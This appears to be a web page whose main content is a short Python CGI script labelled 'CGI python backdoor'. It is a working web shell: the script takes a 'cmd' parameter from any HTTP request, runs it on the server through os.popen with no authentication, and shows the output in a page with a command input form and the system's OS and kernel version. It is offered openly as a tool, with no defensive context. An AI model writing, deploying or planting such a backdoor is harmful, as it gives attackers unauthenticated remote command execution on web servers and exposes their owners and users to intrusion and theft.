Skip to main content

CGI python backdoor

  
#!/usr/bin/env python
# Info : Linux based CGI backdoor with python
# author: otoy
# date : 0x102010

import cgi,os,re,sys

form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)

dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]

osinf = os.uname()
info='''====================================
CGI python backdoor
====================================
Author : otoy
Date : 0x102010
Blog : <a href="http://otoyrood.wordpress.com" target="_blank">otoyrood.wordpress.com</a>
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])

print "Content-type: text/html"
print

print"""
<html>
<head>
<title>CGI python backdoor</title>
</head>
<body>
<pre>%s</pre>
<form action='%s'>
Command <input type='text' name='cmd' />
<input type='submit' />
</form>
<pre>%s</pre>
</body>
</html>
""" %(info,progfl,osexe.read())

Share this with your friends
Loading...